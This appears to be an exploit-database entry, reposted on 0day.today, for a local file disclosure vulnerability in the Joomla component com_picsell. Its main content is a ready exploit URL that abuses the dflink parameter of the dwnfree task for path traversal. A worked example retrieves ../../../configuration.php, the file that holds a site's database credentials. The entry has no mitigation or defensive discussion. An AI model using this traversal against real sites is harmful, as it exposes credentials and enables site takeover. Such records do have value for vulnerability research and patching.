id: 13914
date: 08/30/2010
title: Joomla Component com_picsell Local File Disclosure Vulnerability
author: Craw
cves: 

================================================================
Joomla Component com_picsell Local File Disclosure Vulnerability
================================================================

# Author: Craw
# Email: craw@element7.eu            
# Software Link: http://vm.xmlswf.com/index.php?option=com_content&view=article&id=104&Itemid=131
# Category: web applications
 
=======================================================
   
[+] ExploiT :
  
 http://server/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=[File Disclosure]
  
   
[+] Example :
  
 http://server/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php
  
   
=======================================================
Greetz @ LUXEMBOURG
=======================================================



#  0day.today [2023-03-24]  #